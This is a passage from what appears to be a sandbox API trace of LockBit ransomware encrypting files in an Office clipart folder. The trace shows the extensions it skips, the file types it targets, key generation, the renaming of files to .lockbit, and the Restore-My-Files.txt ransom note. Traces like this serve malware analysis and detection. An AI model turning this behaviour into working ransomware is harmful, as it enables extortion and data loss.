pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0152.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.631] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0152.631] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.635] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215718.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215718.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.635] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.635] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.637] free (_Block=0x1fa2ed8) [0152.637] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215718.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.637] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.637] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.637] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6607e0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa783, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0216112.JPG", cAlternateFileName="")) returned 1 [0152.637] lstrcmpiW (lpString1=".", lpString2="J0216112.JPG") returned -1 [0152.637] lstrcmpiW (lpString1="..", lpString2="J0216112.JPG") returned -1 [0152.637] PathFindExtensionW (pszPath="J0216112.JPG") returned=".JPG" [0152.637] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0152.637] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0152.637] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0152.637] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0152.637] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0152.637] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0152.638] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0152.638] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0152.638] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0152.638] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0152.638] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0152.638] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0152.638] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0152.638] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0152.638] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0152.638] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0152.638] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0152.638] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0152.638] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0152.638] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0152.638] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0152.638] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0152.638] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0152.638] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0152.638] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0152.638] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0152.638] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0152.638] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0152.639] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0152.639] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0152.639] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0152.639] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0152.639] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0152.639] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0152.639] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0152.639] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0216112.JPG") returned 1 [0152.639] lstrcmpiW (lpString1="ntldr", lpString2="J0216112.JPG") returned 1 [0152.640] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0216112.JPG") returned 1 [0152.640] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0216112.JPG") returned -1 [0152.640] lstrcmpiW (lpString1="autorun.inf", lpString2="J0216112.JPG") returned -1 [0152.640] lstrcmpiW (lpString1="thumbs.db", lpString2="J0216112.JPG") returned 1 [0152.640] lstrcmpiW (lpString1="iconcache.db", lpString2="J0216112.JPG") returned -1 [0152.640] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.640] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216112.JPG") returned=".JPG" [0152.640] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0152.640] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0152.640] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0152.640] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0152.640] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0152.640] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0152.640] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0152.640] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0152.640] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0152.640] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0152.640] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0152.640] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0152.640] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0152.641] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0152.641] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0152.641] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0152.641] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0152.641] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0152.641] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0152.641] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0152.641] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0152.641] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0152.641] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0152.641] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0152.641] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0152.641] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0152.641] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0152.641] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0152.642] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216112.JPG.lockbit") returned 72 [0152.642] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216112.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216112.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0152.643] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.643] malloc (_Size=0x40068) returned 0x3d70450 [0152.643] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=42883) returned 1 [0152.643] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0152.644] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.644] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0152.644] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0152.649] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216112.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216112.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.650] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.650] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.652] free (_Block=0x1fa2ed8) [0152.652] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216112.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.652] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.652] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.652] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565a9290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5474, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0216153.JPG", cAlternateFileName="")) returned 1 [0152.652] lstrcmpiW (lpString1=".", lpString2="J0216153.JPG") returned -1 [0152.652] lstrcmpiW (lpString1="..", lpString2="J0216153.JPG") returned -1 [0152.652] PathFindExtensionW (pszPath="J0216153.JPG") returned=".JPG" [0152.652] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0152.652] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0152.652] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0152.652] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0152.652] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0152.652] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0152.652] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0152.652] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0152.652] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0152.653] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0152.653] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0152.653] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0152.653] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0152.653] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0152.653] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0152.653] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0152.653] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0152.653] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0152.653] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0152.653] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0152.653] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0152.654] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0152.654] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0152.654] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0152.654] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0152.654] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0152.654] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0152.654] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0152.654] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0152.654] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0152.654] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0152.654] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0152.654] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0152.654] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0216153.JPG") returned 1 [0152.654] lstrcmpiW (lpString1="ntldr", lpString2="J0216153.JPG") returned 1 [0152.654] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0216153.JPG") returned 1 [0152.654] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0216153.JPG") returned -1 [0152.654] lstrcmpiW (lpString1="autorun.inf", lpString2="J0216153.JPG") returned -1 [0152.654] lstrcmpiW (lpString1="thumbs.db", lpString2="J0216153.JPG") returned 1 [0152.654] lstrcmpiW (lpString1="iconcache.db", lpString2="J0216153.JPG") returned -1 [0152.654] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.654] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216153.JPG") returned=".JPG" [0152.654] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0152.654] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0152.655] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0152.655] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0152.655] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0152.655] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0152.655] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0152.655] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0152.655] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0152.655] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0152.655] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0152.655] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0152.655] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0152.655] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0152.655] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0152.656] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0152.656] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216153.JPG.lockbit") returned 72 [0152.656] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216153.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216153.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0152.661] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.661] malloc (_Size=0x40068) returned 0x3e70008 [0152.661] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=21620) returned 1 [0152.661] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.662] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0152.662] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.662] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0152.662] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0152.665] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216153.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216153.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.665] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.665] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.667] free (_Block=0x1fa2ed8) [0152.667] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216153.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.667] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.667] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.667] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565a9290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa488, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0216540.WMF", cAlternateFileName="")) returned 1 [0152.667] lstrcmpiW (lpString1=".", lpString2="J0216540.WMF") returned -1 [0152.667] lstrcmpiW (lpString1="..", lpString2="J0216540.WMF") returned -1 [0152.667] PathFindExtensionW (pszPath="J0216540.WMF") returned=".WMF" [0152.667] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.667] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.667] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.667] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.667] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.667] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.668] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.669] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.669] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.670] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.670] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.670] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.670] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.670] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.670] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.670] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.670] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.670] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.670] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.670] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0216540.WMF") returned 1 [0152.670] lstrcmpiW (lpString1="ntldr", lpString2="J0216540.WMF") returned 1 [0152.670] lstrcmpiW 